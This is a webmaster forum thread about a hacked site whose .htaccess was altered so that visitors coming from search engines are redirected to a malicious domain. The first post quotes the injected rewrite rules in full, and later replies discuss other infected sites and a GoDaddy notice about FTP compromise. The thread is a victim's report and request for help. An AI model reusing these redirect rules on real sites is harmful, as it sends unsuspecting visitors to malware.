I found today that my site is not getting viewers fom search results so i tried and when i clicked on a search result related to my site it redirects me to http://sokoloperkovuskeci.com/in.php?g=431 so i searched for this prob in google and found that problem is in my .htaccess So i looked my .htaccess and found this extra code added on top of my .htaccess <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=431 [R,L] </IfModule> Code (markup): now i have removed it and my site is working properly But i want to know how it is possible? How can someone change this? and today i saw that many blogs are affected by this attack. so i think its a big attack on all over the world My site is not a wordpress blog my site runs on a video sharing script So do anyone of you can tell me how to stop this type of attack in future. I have changed my admin, ftp and hosting passwords also now....
It might be possible that your admin details were leaked to some unauthorized party or someone has hacked your admin details. There are many such viral programs running on internet which are targeting sites and inserting such codes in their home directory and in their linked and related sites too. You should be careful in respect of those and keep changing your admin details once in a month for security purpose.
Going by their Alexa rank, their getting lots of traffic. http://www.alexa.com/siteinfo/sokoloperkovuskeci.com Not sure how to fix it, but if you keep searching, you may find someone that knows what exploit/vulnerability they used, then you can search for a patch. Good luck.
i searched a lot, but didnt found any trick to patch this hack... if anyone here can do it i would be very thankful...
The same thing happened with me and what i learned means using free or low cost hosting are easily hackable.my forum too was redirected to another site.
Check this website, it seems to be the answer: http://cleanbytes.net/google-search-results-poisoning-or-wordpress-vulnerability
Hi my site is currently infected with Malicious software is hosted on 2 domain(s), including sokoloperkovuskeci.com/, smartehholder.com/. I think same as yours I just want to ask where can I find the .htaccess so I can manually delete it.
Hi guys, just wrote a blog post on this as it happened to one of our clients. GoDaddy is not saying much yet but there is not a lot you can do at your end. http://stewartmedia.biz/search-engine-optimisation-blog/godaddy-malware/ GoDaddy are saying you will be notified if compromised and are suggesting changing passwords.. which is a little unsettling to say the least.
GoDaddy finally sent this out to their customers. "Earlier this week, our Information Security Team detected suspicious activity within your hosting account. The investigation concluded someone had changed your .htaccess file in your home directory using FTP. The attacking IP was blocked, and your original .htaccess file was restored automatically. To safeguard your account against another unauthorized change, we have reset your FTP password. If you use a content management system to manage your content, no further action is required. If you do use FTP to manage your website, you will need to change your password before reconnecting. For instructions on how to change your FTP password, see our article Resetting Your Hosting Account Password (FTP Password). If you have any questions, please call our live, 24/7 customer support at (480) 505-8877. Sincerely, GoDaddy.com, Inc."